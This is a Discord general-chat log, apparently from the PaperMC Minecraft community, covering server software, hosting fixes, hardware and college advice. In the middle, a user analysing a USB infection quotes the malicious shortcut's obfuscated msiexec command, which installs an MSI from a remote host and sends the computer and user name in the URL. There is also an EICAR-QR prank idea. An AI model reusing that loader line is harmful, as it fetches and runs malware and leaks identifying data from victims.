#general
3141 messages · Page 1890 of 4
Reports were above 1tbps but measurements above that weren’t supported (so server-side reports were only able to say “bigger than 1tbps”). But the attacker claimed it was 2tbps capacity and tbh, I believe it.
Did they caught them?
I’m not sure, the guy disappeared off Twitter. I know authorities were contacted and involved but there weren’t any follow ups that I was aware of.
oof
The mirai kid got caught and prosecuted fwiw
But only because he attacked his uni, not for the whole protraf shit

No? US
They got out easy cause they worked with the FBI I think
I don't remember, this was years ago
Just google it, lol
Paras jha was his name iirc
Don't remember the others
Josiah
Something
i don't really care that much TBH
Josiah is the protraf and tcpshield guy
He got thrown out of tcpshield tho iirc
Idk, it's all convoluted

But they were literally attacking proxypipe customers to then onboard them on protraf
Literal mafia
Something like that
Those were wild times
200iq
was pretty crazy seeing brian krebs talking about minecraft, lol
it all just comes back around to minecraft
casual reminder that block game servers dealt with log4j better than many fort 500's
ur a block
Somebody liked one of my retweets of something
so
Memory leaks on missiles don't matter, so long as the missile explodes before too much leaks. A 1995 memo: https://t.co/RIRF1u75Qt
7191
4679
what is mapart?
We call those SVG. 🛌
?
Mapart is when you build images in a 2d plane, then make a map of it to have images as items or on the wall
mmmh I wonder why my params don't affect the result https://i.imgur.com/vwFAWAK.png
so you just downscale to fit minecrafts resolution?
plenty plugins exist for that too
Hi
hows murica?
I want to build it on a server a friend of mine hosts, which runs spigotmc and has a tps of ~11 when we're exploring
basically you just downscale it, do a bit of trolling and somehow calculate the y dimension of a pixel, then build it and make a map of the area
y dimension affects the color a block too
On the same lines, I’ve worked on radars that go in similar such munitions that happen to burn up after 20 minutes 
They only need to last 5 minutes 
CPU cycles 2 expensive for cleaning up
@quasi valley I just got an email from you
remember
git pull


hmm jenkins is returning 502 on my server but the service is running
what could be the cause of this?
i should make a pr to somehow remove the regex filter / optimize NamespacedKey creation because it's almost always the root cause of minor bottlenecks and it bothers me
seems to be related to cloudflare
if i dont pass through it works fine 
like calling .getItemMeta() on an item with a lot of enchantments is slow because CraftNamespacedKey#fromStringOrNull is so slow
eeeerrr
could maybe make it actually like, just look at the chars
would remove the regex, idk how bad it is though
can't exactly remove the validation checks, however, cos people do dumb shit
thats what i was thinking but i'm also not sure if that's any faster
i know, i cheated in my code base and i used objenesis to create namespacedkeys to remove the bottleneck, it's definitely an improvement but a lot of places i can't cheat with, like itemmeta calls
don't mention
don't mention what
Don't mention cat
disable the mention on reply thingy
ohh shit oops sorry i get annoyed at people for doing that and then i do it myself
Pretty sure that we've checked string vs regex somewhere and worked out that the regex was faster
i hate there isn't a global toggle for it
less cases, was for the name check
Java just does not optimise regex lookups all too well
yeah it's tricky to find a way to keep the validation while also keeping it as performant as possible
is there a fast regex library?
maybe the no ping is subconsciously making more people ping you cat
does paper reset build numbers after major release updates? 1.17->1.18
aight 
oh, I mean, I guess theres the Pattern itself which can be compiled
Any clue how that works? I just use jenkins build numbers
We create a brand new job for each version, basically
it's how we can have .17 and .18 still having builds in the correct order, etc, still
is that automated? or you doing that manually for each major update
Probably by hand, iirc teamcity just lets you clone a job
ah teamcity 
pros and cons, really
Given that you break everything you touch, that may be the best option
Also keep in mind that teamcity has limits on the free version, 100 build configs and 3 agents
mans got a point
It's not my fault nothing is designed to work like i want it to 
DED.
You're the type of person where a hoover would malfunction on.
"Why's it blowing?!"
vacuum cleaner
i mean we have a vacuum cleaner that can blow 
to unstuck the filter (its an industrial one)
mom sez don't disturb me when I'm cleaning my room!
shut up @plucky sparrow
random
cats "hoover"
Henry the Hoover sucks cat
You shut your hoe mouth
inb4 cat gets sucked by henry the hoover
lmao its even better that you know its name
Bro
henry hoovers are like
Like, our school had a henry
I think every school had a henry
I'd be terrified having that thing in my house
Henry got shoved in lockers alot for being named henry
I agree
daps so cringe with marvel pic
why r u so obsessed w me
u the one trying to e-date me
cringe attracts cringe

that's photoshopped

r u using betterdiscord..
I've never seen it show the specific hour & min on mobile
well no shit
u
nomana stop using client modifications
for ur edating roleplay
oh god, that message, instant classics
cat, you're never answering to my good night messages
too cringe
nomana literally shut up
mods
that's not friendly
who r u
it does show a long date for me
must be android only then
had to resist the urge to take starboard
do it 
someone's gonna ping a certain mod and that'll be it for me
at least cat's ss?
same thing will happen
god damn it
it's very tempting
what's the worst that could happen
it's only discriminatory against cat (if at all) and tastefulness is a matter of taste

i think nomana should do it
that is not a bad idea
I'll get promoted to Chief of the General Chats if I do it
sure
there seems to be a lot of talk and a distinct lack of stuff happening
u and ur diary gang can do it
what's a diary gang

Imagine using NMS and the function you need is protected... why mojang.
https://youtu.be/35ucFNtMx7c not really into the whole 2b2t shenanigans but the tools used for this are pretty interesting
Today we discuss The Man That Saved 2b2t History, and how one of Minecraft's largest preservation projects became a reality!
Check out my new video and download Dark Nemesis now at https://bit.ly/FitMC-DM! Don't forget to check their video contest, create your own video with the hashtag # DarkNemesis,
you will have a chance to win gift cards an...
paper fork to the rescue!
this is what happens if you go mad with reflection
Teleporting the player efficiently: Reflection Edition
There is more, I just could not fit it all on screen.
I tried to do everything in VarHandles cuz reflection is slow, but on one field mojank put final keyword, so this is semi-varhandles semi-reflective solution
how much faster is that?
I want a paper on it on my desk by monday
This code allows registering custom world spawners, these spawners are used for phantom, golem and cat spawning mechanics in mc
Honestly, I have no idea. It's inherited code, so I am not 100% sure how it works, I had tried replacing it with other methods of teleportation, but it breaks the feature reliant on that teleportation, so I am stuck with it.
if your colleges care, probably
Here they don't care about your hs scores, they just take entrance exams
I don’t have a lot of confidence in my test taking ability
I just read the rules in #welcome again and I wonder what does "• Ableist slurs or speech" mean
but I do have a lot of confidence in my learning ability
Also that is an older version which I need to update because mojang like to change things and make everyone's life miserable.
No slurs or speech against People who are disabled
im sure google can tell you
oooh thanks
I tried to translate it but didn't find anything lol
Yes but we can tell him too
got it, thanks 😄
well i cant cuz i didnt know what it meant 
now you know too!
no one ever in the entire world ever deserves respect
you earn respect
You earn respect by dabbing in the middle of the street

Not reading the rules makes you even cooler
For real i wanna go to a college like mit and vanderbilt
Do you think i should go to a community college for 2 years then apply to a better college for the later 2 years
You're asking this in a minecraft server, wouldn't really rely on the replies you get here
Yeah but it’s full of people who are older than me and people who are in college though
Mostly For the same field i wanna go into too
well those things really depend on where you live
I think you should talk with your parents on this theme
teachers or parents?
no
i was reading sat sample questions and none of them don’t make sense and im supposed to be a senior
but i do have friends that are younger like sophomore that are taking this kind of work and stuff and are already making college preparations
but it might be different learning environments
most the people where im from usually don’t go to college
wow
standardized tests are scams and they shouldn't rule ur life
you say that to someone whose next few steps kinda depend on how well they do on a standardized test
💀
@left swift cringe
@left swiftcringe
@left swift cringe
@left swift cringe
@left swift cringe
@left swift cringe
mods I'm being harassed the diary gang
you harassed yourself
A lot of schools don't require SATs at all these days, but if you are reading SAT questions and thinking "golly a lot of these are really hard" then you probably should not be aiming for a "top tier" college. There is nothing wrong with going to a 'lower' level college.
your point is not valid
damn mbaxter said you're stupid
No, I did not. And if you keep up your nonsense I'll remove you.
sheesh
thx
Serious Saturdays in paper
No, I just don't like seeing people bully others.
your probably right mbaxter
i thought if you went to a top tier college you would get the best education on the subject your interested in and be able to pursue better jobs because of that
like a cs degree from mit would sound better than a cs degree from a random college in nj
It sure would. But you don't need to be competing against those people for jobs anyway. The world is huge.
(and, plenty of places aren't going to actually care where you got the degree from as long as you can prove you're good at it)
Honestly this is correlation, not causality. The reason people who go to the top schools get top jobs isn’t because they went to top schools. But rather, because the qualities top schools look for happen to be the same qualities that top jobs look for.
Plus, for all but a handful of careers (think lawyer, doctor, or academic/research positions), nobody cares what school you went to once you have 2 or 3 years of experience anyways
Going to a top school or not in no way matters at all
🖕 mojang
ok status
malformed response
well apparently its 204 no content
great
should have read the docs

only third party docs exist 
third party docs are better than nothing...
Which actually mention that...
yes, I saw it afterwards
git rekt
mojang sure loves their 204
anyone seen Emily lately? they've been quiet with me for about 2 months and I really need the plugins they were working on for my network
the one and only, obviously
indeed that is the one
Next episode of why IntelliJ is the best IDE
Next episode of daily dose of bugs in intellij
i will say your alma mater matters a lot for networking
hiring manager who went to your school or is very familiar with it will be more likely to hire you
but networking at a large state school can still be fantastic and probably gives you a bigger advantage than networking at a smaller private school that might be "better" because you're more likely to run into an alumni
yeah i was meaning that
also hiring managers frequently do frown on having a gpa that is too high
I feel like they only frown on that if you don't have other significant extracurricular stuff too
like, 3.98 but all you did for 4 years was sit in lecture and take notes, pass
Im almost through freshman year, and I’m sitting at a 3.87, with all pre-AP or AP but I just didn’t get a chance to join clubs or do any competitions, but I’m in the varsity tenor/bass choir, and the middle-rank orchestra. I’ve been told I need to do more extracurricular activities, but I’m just not entirely sure where to begin looking for those…
Tbh company don’t give a shit about your grade point. It’s really who you know
Grade is mostly just for scholarships
Yeah that’s what teachers have said.
i’ve been told by hiring managers that they are concerned the person has no social skills
Yes
You are in a company especially working in a team
They will want to make sure you are easy to work with
A company would rather get someone with good social skill and less than perfect actual job skills than say someone who’s extremely hard to communicate with

me with my proud 3.0
I have soon recently saw Minecraft Kotlin Server core
but forget it's name
any knows?
I love kotlin stdlib
Oh... Stop saying core / kernel about minecraft servers, it is called "Server Software" or "Серверное ПО" in russian
I've not heard of a MC server written in Kotlin
Someone probably made one that goes as far as getting you in game and sending you some generic flat (non persistent) chunks though
Krypton
I thought Krypton was a fabric mod to make networking better
same name yeha
two different projects tho
"GitHub - KryptonMC/Krypton: A fast, lightweight Minecraft server written in Kotlin" https://github.com/KryptonMC/Krypton
lol, and they also lifted the networking from velocity, same as the fabric mod
yup, got into some licensing problems
creator is also banned from the paper org iirc haha
How do people even get org banned lol.
krypton is just a hobby project tho, it's not a serious server software
Btw, I even saw mc server rewritten in assembly, yeah, it was only basics such as mc protocol and flat world I guess, but anyway, that's crazy
pfft, someone made one in bash
at this rate we're going to see a minecraft server written in skript soon
POV: Your class has no warnings.

@ SuppressWarnings("all")
I mean suppressing warnings is fine as long as you don't suppress warnings that are actually an issue.
And the second one is suppressed because shadowing the name is exactly what I want to do.
name shadowing is bad and you should fix that
but really, you can just tell IJ to ignore unused stuff for things that fit (i.e. overridden methods, stuff annotated with a certain annotation)
-Xlint:none
Yes but then it won't apply to anyone else looking at the code.
Generally I don't do it, but in this case I am fine with it as I don't want the original value
can i ask a random minecraftt question here?
my users cannot tab commands like /msg /sit etc they all stay red when typing. is it because i use permissions plugin?
Warnings be gone!
if they can use these commands, no. are you using any plugins that block tab completions? or did you change the tab completion config setting (spigot.yml iirc)?
Although for now at least I am trying to avoid static variables.
Which annoyingly means passing around the plugin instance.
Will this fan blow towards me or away from me?
I think toward you but good luck
Definitely makes sense
Otherwise you wouldn't see the logo
Im surprised if that fan blows at all, it seems to be in pretty bad and dirty shape
Hey, paper is a hobby project too ^^
every block game project is a hobby
i mean, the multiple thousands of pounds sitting in your oc doesn't scream hobby project :p
all of it for the nice heart on the discord username
What happened to the oc btw? Last expense was in early january
Permissions:
- antipluginlookup.allow.tabcomplete * To use [TAB]
<_<
Thank you for making me look further
don't hide your plugins, its useless 😄
yes so it seems
Am too afraid to look at that, lol
so we are not financing your beer consumption? disappointing
Nah, only my private GitHub sponsors goes to that
any help with compiling paper from source
(i tried ./gradlew build but that errored on the task :paper-mojangapi:compileJava)
OC money is for infra
Also, am trying to sleep but I have a resting pulse of 85
Urg
damn
a full error would be helpful
re-trying build but now piping to a log file
log.txt by @mystic siren: https://paste.gg/90e4b26e54ce4f0d8f05793f5bfe611a
Did you actually apply the patches?
wait that is not included in the build steps
so i just have to git apply all the patches right
gradlew applyPatches
when you have videos/songs open in 5 different applications and 3 different chrome tabs and press the play media key
running ./gradlew applyPatches build
its always a surprise which one will play
Don't do it in one step
media sessions seam broken in windows 11
First appP, then build
Uuh, magic sword, good taste
this is a screen from google images
these things dont appear in windows 11
just the volume bar
I see it when I click on the volume icon on the taskbar
tho, I'll look that song up now
wtf
so this is where it went
that is mildly irritating
having it in the same place as the volume kinda makes sense
you can also just press Win+A to open that menu which is pretty nice
Thx 4 the KnowledgeKevin
Bro it always feels like there’s a button stuck
No matter what keyboard i use
Like the fn key or one of those special keys are fucked up
clean your keyboard?
And that pop up is always there
It happens with 3 different keyboards though
One was brand new in box
windows 11 is so fucked up
tried uninstalling random software
clicking on it opens nothing
Can you really blame Windows for 🗑️ programs you installed? 
if you really are annoyed by it you can also disable the media overlay thingy on Win 10, its in the taskbar settings for some reason
wow
so many background programs 
literally cannot open anything related to windows security
fan control, torrent client, rgb software, some weird update util I cant uninstall, discord, nvidia graphics thingy, tidal (music streaming)
just checked and I also have five, so nvm 😄
the notification is its own app for some reason and should be in your task managers auto-start section

why did I move to windows 11
i think i'll stick to 10 for a few more years 
pretty sure the notification is a thing on 10 as well
but I would def recommend turning of web results, makes the search so much nicer
and faster and more stable
don't remember, probably group policy or regedit or something
How much electricity do fans use?
not much
dm me if you're a good developer
⛔
I somehow think good developers won't do that
I'm not doing that
It's a trap!
Quite
ooh, that's evil
Put the EICAR antivirus test string into a QR code and start showing it to random scanners
You used to be able to kill IRC connections with that back in the day, apparently AVG (iirc) was doing a MITM on your connections and looking for viruses
Someone's done this!
This QR Code decodes to the well-known Eicar Antivirus Test String. If something is watching you, sees this and decodes it, the resulting data will be classified as malware and removed by any Antivirus system that touches it.
Be warned: wearing this cou • Millions of unique designs by independent artists. Find your thing.
the qr shouldn't be that "big"
scanned it and its fine, i wonder what generated this one because it has a lot of alignment patterns
They have stickers too although they're still too big I think https://www.redbubble.com/i/sticker/EICAR-AV-Test-String-QR-Code-by-stevelord/43649350.EJUG5
This QR Code decodes to the well-known Eicar Antivirus Test String. If something is watching you, sees this and decodes it, the resulting data will be classified as malware and removed by any Antivirus system that touches it.
Be warned: wearing this cou • Millions of unique designs by independent artists. Find your thing.
Learning a lot about QR codes.
Supposedly a QR code with that many alignments is a version 8 qr code
eyeballing it to this pattern seems to check out
Is that a default mc msg or the server specifically
I thought MC always said not authenticated w Minecraft.net unless that’s the new shit cause of the msa migration
velocity
hey so devops usually have to be comfortable wit kubernetes
how can i start doing kubernetes do i need my own home lab maybe a basic setup like a raspberry pie or can i use a digital ocean or what’s recommended
kde on wayland is pretty nice
i am going to be ditching dwm
i just have a ton of junk though
i said fucking wow
nvidia must be smoking that k2
I mean people already paying close to that for current high end card
i paid $4000 for a full pc with a 3090
just how good will the 3090 ti be over the 3090
More than half of that cost is on card 
yeah
11900k 32gb ddr4 and idk anything else
maybe you can prolly figure out how much i paid for the card from that alone
1tb nvme too and 2Tb hdd
You probably don’t need it unless you are driving multiple 4K displays or have workload that requires those gpu tbf
Oh look, the card that will probably never actually be released. 🛌
why would you say that
the first sentence of the article says it’ll be released later this month
Founders edition! Only 200 is made globally! @ashen cliff pls wait for manufacture
i like the 3090 though
i can play any game i want
and it’s usually at least 60 fps
if not more than that
You used to be able to get the Titan V CEO Edition for like 4k€ back in the day...
And that's 32GB of HBM2. 
Hey I had an old Titan card!
Less performance than 3060 but it uses 4 times the energy!
are 2080s still hard to obtain right now
wow i see them going for $550
i thought they were gonna cost like $1000
it’s a very nice card
3080 better
my 1070 still works fine for 1080p and even 1440p for most games
who would’ve thought
I'd be mostly happy with my 1070 still if I didn't get monitors that needed newer DP and HDMI
I run two of my monitors through some weird dp -> hdmi adapter cable sooo, well
not sure if im loosing anything this way, but it seems to work fine
you can't afford to duplicate doubles, bro!
don't worry though, because the compiler will just inline that anyways
actually, maybe, since we don't know the rest of the code
nope
useless
like bro srsly
The real question is, what is it used for?
Maybe calibration?
maybe they thought its more readable this way
idk
he is a competent programmer idk why its here
good thing im not in charge of the climb part of the robot, so there is 0 blame on me
There are code style things about no magic numbers
People misunderstand them and put const ZERO = 0.0 instead of const STATIONARY = 0.0 or similar
But it makes the IDE/linter shut up since they don't understand english
sometimes it's helpful, I'd need to know where the constant is used
a constant can be more verbose than just 0.0, like if it's used to turn a servo motor, instead of putting 90 you might want a constant STATIONARY and instead of 180 a constant CCW or whatever it is
ITS_DEFINITELY_NOT_MOVING_RIGHT_NOW
yeah that, that's definitely what you want
might push it past your IDE's "no code past this" line but
it's okay
should tell mojang that, private static final int HOW_FAR_AWAY_TO_TALK_TO_OTHER_VILLAGERS_ABOUT_GOLEMS
Mojang uses constants, at least for some things, but then javac and/or proguard inlines them
apparently i have an account in Bukkit forums but i can't recover the password because it's with my deprecated Hotmail email 
I hate Microsoft's email service
and mojang likes being very descriptive with their naming of things
"oh, password recovery? no, it's spam, or even better, it's stuck in transit so you can't even take it out of spam, it just doesn't exist"
"also look at this ad sidebar"
"(...) so there is ZERO blame on me" ;)
I like how there have been 10 reviewers for a PR with 100 lines of code (#5392) 
Hello everyone, can you recommend a good chat plugin with support Hex color and gradient
1.18.2
Good chat plugin 
Carbon when
Carbon rewrite waiting room 

Aka slapping final on two fields and going to sleep
ViaVersion 1.7 branch 
J

a context menu scrollbar doesn't actually seem like such a bad idea to me... but maybe if it just didn't crash explorer.exe
lol, Hardware Canucks 3 month update on Pixel 6 Pro is "this thing drove me to buy an iPhone"
that uh... is not good (for the pixel)
Oh jeez another evergreen ship ran aground
Luckily this one is just on a coastline and not in a canal
the first thing I would do is enable full context menus
I dunno who thought it would be a great idea to hide half of the useful shit that comes from them
iirc there is an API to add stuff to the new menu they're just hoping to clean up some of the cruft by making people start over
I think there is even a 7zip fork that works with the new menus already
so i'm trying to analyse some weird malware that's somehow reached my father's computer from an infected USB drive
I've managed to nail it down to a shortcut that's running a CMD script along the lines of doing something like this..
stArT MSiEXeC -i "httP://b9.pm:8080/5eIOqPxLjfr/%comPUtERNaME%?%userName%"
sTaRt expLorer "USB Drive"
And this seems to redirect to a QNAP server, but what's even more interesting is that every time I re-plug the USB I get a new URL with an entirely new ID
has anyone seen this before?
Id could be a timestamp or something
But yeah it just connects to a CNC server
Nothing special really, should try downloading the script
Or well, the msi
yeah, that's a good idea, although what's interesting is how it gets you to click the shortcut
it moves all the files in the folder and creates a shortcut with the same name as the drive, so you have to click it in order to get access to your files
the folder itself is hidden, by the way
so this is not targeting someone who knows to show the hidden files and folders
and by clicking the shortcut, the command is invoked
i mean, these things are rarely targetted at tech savvy people
its for people like your dad 
my dad programmed before programming was a thing
Hi, hetzner "changed" my main dedicated server's IP. But the old IP is still reachable and new IP no. No changes. They told me that I have to do something with Network configuration in my OS and they wont tell what exactly...
he made DMX controllers on one of the first laptops
true :(
I thought hetzner used DHCP for the main IP address
otherwise, google the instructions for your specific OS
But I did not set the static IP ever
anyway i did find a stackoverflow post on the virus but nobody responded to it kek
time to dump your knowledge
But, if not, you're gonna have to go check the config
i'm at that step that that guy is at
waiting on my dad to let me use his computer to get a new url and not let it expire by clicking the shortcut
yeah thats what i tried yesterday but the URL likely expired
It is hard for me and I dont know what I should type in Google. Seriously. How to change the IP address in Ubuntu? I dont know what I have to change in mu OS
depends on the OS.
depends on the OSes config.
Ubuntu has only used like 3 different network configuration methods over the past 5 years
shouldn't it just be assigned to your network interface from hetzner?
So OS can affect the IP address?
wut
only thing you can do is set it static or dynamic and static allows you to fill in one
but its up to the router or whatever to accept it or not
as said, different OSes/distros use different mechanisms
ubuntu has had network manager
traditional interfaces file
and netplan
you'd need to see what version your machine is using
lmfao
idk what you're expecting from hetzner
They provide you a box and the infra around that
they're not your system administrator
They don't know how your OS is configured, and unless they offer remote hands and you wanna pay for it, they don't care about it either
I paid 17e for this IP change but there is no change at all
-.-
You need to change it on your OS...
well hey at least your panel loads
Maybe it helps
You aren't already using static?
No
they offer DHCP by default last I knew
TIL
No idea if changing the main IP of a box is something they handle on their thing
so did you buy floating ip's or what?
Well, if they paid to change the IP then Hetzner's DHCP server should be handling it
If they paid for an extra one then they probably have to manually bind it
tf an ip costs more than my entire box does 
Mounting system partition can affect my data?
Have you tried rebooting the server?
Yes, many Times
If it's configured to get IP via DHCP and they've changed things on their side then you'd assume on reboot it would use the new IP
Then it sounds like it isn't configured to use DHCP or they fucked up their end
I think they dont know what they talking about, this is copy paste message
Verify your server is using DHCP and then tell then you did so
Or just set it to static and forget about their DHCP server
Well i get the same feeling from you tbh 
Can I do it from OS or I have to use "rescue system"?
from the OS
You usually don't want to try to do networking changes from the OS
Like, you can at least check the network config on the machine
theres also the rescue system, etc
Look sure but if you touch you'll probably end up in the remote KVM anyway
May as well start there 😛
Is rescue system safe and no data will be loss? I dont know what is this
it's a linux OS image
Oh, their setup is weird
Thanks
ofc, if you're really uncomfortable, hire somebody to look at this
I figured it'd be IKVM or whatever in a web view
First, I neet to learn about rescue system
well, they offer a iKVM OS thin which is basically just debian + QEMU
or they have actual like, KVM dongles with fucked up VGA cables
The thing where you get to see your BIOS and boot your actual system to a tty
nah, they don't offer iPMI
You're probably going to fuck up your networking config
And then you won't have network access
Just the idea is that if you fuck up and know how to use the rescue system you can use that to recover
And then you can't fix it anymore because you need network access to do so
I will dont change anything, I just want to see it
But if their rescue setup is that jank maybe you want to try to avoid it and just hope you don't fuck it up
Or just take this opportunity to switch to OVH
So rescue system = bios?
You get the IP via DHCP... So?
no
@worn ember right and
Jank system expert krusic is here
it sends out a fake 404 nginx page
because every other 404 is different on this website
😐
It sounds like their rescue system is TFTP booting a barebones linux system so you can ssh in and poke at your disk
checking now
yup
Yeah, they use PXE to boot it.
nothing out of the ordinary on response headers..
but at least now i have a direct address
could be that it validates what makes the request and show 404 page if it doesnt exactly match the request headers to avoid getting detected like that
boot up wireshark and check what the program sends
yeah that was my second plan
i just don't want to fill up my dad's computer with tools lol
"the program" is just msiexec
well the rest of the script is obfuscated
so it might be doing funky shit with REST before the request is sent
The snippet you showed was just calling msiexec with the URL
Unless they're doing some kind of port knocking that should just mean you need to pretend to be msiexec, a standard tool
Albanian virus. 🦾
Like, point msiexec at a web server you control and see what it sends
this is my old IP. I typed "ip a" in my linux terminal
This is not how you check your network configuration
this is a fair point
whats your host
im just walking in but i think i understand whats going on, whats the host here
yeah, should have elaborated that that's basically the only readable part of the script
the rest is obfuscated jumble and i've tried a few deobfuscators to no avail
hetzner
That's not actually Ubuntu 16.04, is it?
yeah i probably could have like.... whois'd the ip in retrospect
Are you literally on 16.04 or is this machine as old as time (April 2016)
this is old machine
ඞ
now ddos attacks started, I just want to change IP and keep in secret
lsb_release -d
What is the response
It's just gonna give you the version of your system
Mine, as proof the command isn't malicious:
16.04.6 LTS
this machine is so old i have to google the ubuntu docs for it hold on
check /etc/network/interfaces
failing that, ls /etc/netplan
idr what config system they used there but it's either gonna be those or, that was in between those and it's networkd
which, if it's networkd, idr where the config for that was
yes
just like that?
Or just DHCP. 🛌
you should have also been given the new gateway and the mask to use
or just enable dhcp and pray
Did they give you the new address, gateway, etc?
yes
isnt networking fun
Put all those in instead of the current ones
You'll need to replace them in a few places it looks like
but I dont know what "up route add -net" is
that's adding a route
Just replace the IPs in it with the new ones
okay
i'm not too good at wireshark but i do see that it's establishing a tcp connection after the 404 when msiexec runs
It is working from new IP! Thanks a lot!
That'll be $9.99
Also your system has not received any security updates in over a year
So, you know, it's probably swiss cheese
Probably just a hole.
I think I have to update but I have 1TB of data and it will be long process
It's not like there's been two Ubuntu LTS releases since 16.04 was released or anything
do-release-upgrade if that's still a thing once your system is EOL
But yeah, you generally want to do backups before you upgrade things
wait, but if I keep my iP in secret and only port 80 and 25565 will be accessible from outside (ssh, ftp ports will only be accessible from real IP thats know only I) then noone can hack it?
You can scan every IPv4 address on the internet for things in minutes to hours depending on how deep your scan is
From a laptop
scanning
I mean
There is literally already a website which does that for you even if you don't have the resources to do that
but, I mean, welcome to the joys of literally anything hosted on a public network
I will add a iptables rule that only I (from my PC at home) can access to port 22, ftp etc
btw, I mentioned this earlier so here is a link https://www.microsoft.com/en-us/p/nanazip/9n8g7tscl18r
this game can look so good sometimes
Too bad the actually playable version is https://store.steampowered.com/app/383120/Empyrion__Galactic_Survival/
Empyrion - Galactic Survival is a 3D open world space sandbox survival adventure. Build powerful ships, mighty space stations and vast planetary settlements to explore, conquer or exploit a variety of different planets and discover the mysteries of Empyrion! Fight human, alien and biological hazards and survive in a hostile galaxy full of hidden...
$19.99
23194
(DiscordBot) Empyrion - Galactic Survival - Empyrion - Galactic Survival is a 3D open world space sandbox survival... - Adventure, Indie, Simulation, Strategy - released 5 Aug, 2020 - $19.99
See, I love those types of games
never heard of empyrion
I just have the attention span of a potatis and don't play them as much as I wish I did
Empyrion is basically a clone of what it looked like Space Engineers was supposed to turn in to but playable and kind of ugly and filled with stuff they just picked up on the unity asset store
next SE update is gonna be focused on objectives and story
Like, it's buggy but you can play for more than hour without needing a supercomputer
And it doesn't have all the fun rotors and such like SE does
you dont need a super computer at all tbh, i've been playing for hours and it still runs fine, even with tonnes of AI ships cruizing around
granted i'ma need to do some base building 
My experience with Space Engineers saves was always the same as Minecraft modpacks, they have a limited lifespan and it feels like no matter what you do you can't put it off
Eventually it just runs at 4 tps and 10 fps and you gotta bail
yeah well idk what you expect to happen if you can literally add unlimited items
its not like its magic and just computes itself
Like, even if people tried to keep their stuff clean I think every crater from a meteor impact slows down rendering
its improved a lot over the years, i'm glad they didnt ditch it at least
And you can't just go smooth it out or fill it in, it's the fact that the world changed that makes it cost something
yeah thats really annoying
looks like you can remove them with the admin screen now
but i wish there was a survival alternative to it
like you'd do for welding up deformed blocks
are there any way to bypass microsoft account migration? I forgot my microsoft account password and I cant access to my phone
No
hi, i just discovered paperMCn, I've seen it in Holycube (on YouTube, it's a private vanilla minecraft server between Francophone Youtubers, like Aypierre), i've some issues :
-Is paperMc compatible with 1.12.2 or 1.8 ?
-Are there any forged builds ?
there are jars available for those versions of mc
unsupported, but, available
and no, paper doesn't support mods; theres been various attempts over the years but generally not recommended
have you any version for my case in particular ?
no
and mohist ?
Where I can find correct packet sequence from success player login to sending keep alive packets
I send correct sequence, but I didn't get serverbound client settings packet
client freezes on "Connecting to the world"
or crashed with empty error
server logs are empty
Ask their support and not us
this is not paper, this my own core
if wiki.vg isn't helping you, use a tool like pakkit to see what a normal sequence is
or you can look at clean-room impls like minestom (or, like, just use minestom)
maybe nbt library is bad?
what
this is snbt encoded dimension codec tag
How many players can join a 10gb ram ryzen 7 3900X 4 vCores server
with abt 40 plugins
any idea ?
core protect got many ram and cpu
I think ~200-400 players
maybe 500
r u sure
Never
30-100 I guess
he said without plugins, and he said 10 gb full to server
my server with manyy plugins and 5 gb ram can hold 25 players
with 20 tps
How many ?
50-60
plugins
the amount of plugins is such a useless statistic
can u dm me the ip ?
But 500 players on 1.18.2 is nearly impossible
my server on 1.17.1
now we migrate to another hosting
i just want to know how many players can join a 1.18 server with 10 gb ram Ryzen 7 3900X
we wait when host will give our it
i just
I told you
how long is a piece of string?
Here
this CPU doesn't exist, only ryzen 7 3700x ou 3800x 😓 or ryzen 9 3900x
Thank you Google?
https://posili.me/i/JnxQZTgG-2022-03-20_12-43-36.png
stuff like this is why I don't like css, lol https://streamable.com/vsk0f2
Just write it better.
tell me how ^^
Depends.™️
solution: dont make things bold on hover 😄
Make the box the size required by bold, so it doesn't get expanded.
Or, make the text not "push" the box.
text is dynamic is the issue
css-tricks to the rescue
If I am on 1.18.2 the which version will require on bedrock?
If you are using geyser, ask in their discord
Ok
Bedrock
paper general on fire today
Time to add another Geyser abomination to the mix: https://posili.me/i/t2Rw4Akm-2022-03-20_13-09-05.png
🛌
isn't it always?
can always count on @void void to be the first to 
If I were you, I'd take a deep breath. And hold it. ❤️
What’s up guys, I was wondering if there was a plugin to optimize the nether? Yesterday we had a single player in the nether flying around and brough tps from 19.5 down to 7.8 😕😕😕
Pregen.
Good morning everyone
Ah
hey paper mc this is not allowed why you support 2b2t when 1.12.2 is not allowed to support
tf are you talking about lol
2b2t isn't supported by paper, because they don't use latest
they support themselves
in 2b2t is paper mc jar 1.12.2
they can use whatever they want
they just use an outdated version of paper and fix problems themselves
but when owner 2b2t found problem he sand mail to team paper
and paper say we fixed
?
🤨
we don't fix issues in 1.12
and I am not aware of ever having received an email by the 2b2t owner, they have however reported issues on github before iirc
first time hearing of a paper team email existing 👀
not sure that is publicly listed tbh
It is, on the github org page
but we have a contact us form on the new forums that you can use I guess
were 1.16.4?
oh the admin email on github lol
that question doesn't make sense
please use full sentences
we only hard link the last version of any major version
if you for some stupid reason want something else, you have to use the api
but you should never need to do that, whats wrong with 1.16.5?
and also fix all bugs and exploits yourself lol
and like, you should use 1.18.2
im not stupid the map only work in 1.16.4
the maps?
man, I can't do this on a sunday
average papermc general
1.16.5 is the latest 1.16 version, use that if you want to use the bare minumum of support that paper provides for legacy versions
well, it belongs into #paper-help
if not then you are free to use/build any other bersion you want
the 1.16.4 build even is attackable via log4shell...
Duh
Changes between 1.16.4 and 1.16.5:
- An issue with POI data being mismatched (MC-203337)
- Some stability problems
- Some security problems.
That's literally everything...
If a "map" was released for 1.16.4, it will almost certainly work on 1.16.5.
Unless your "map" is intentionally trying to crash your world, it should work just fine.
does anyone know what minidigger's pfp is?
Lego blocks
It's from the art of the brick exhibit
How do I know how much RAM my motherboard supports?
Check the manual or look it up on pcpartpicker
can i assign groups to players in LuckPerms without them ever joining
@warm anchor 
yes
how tho
Same command as players who have already joined afaik
No u
i believe you have to use their UUID, but yep
Imagine using commands with luckperms in 2022
imagine using commands
Imagine coding block game oh what?
love u kezz xx
no u xoxoxoxo
I keep wanting to type koyori instead of kyori
@untold meadow 
?
)





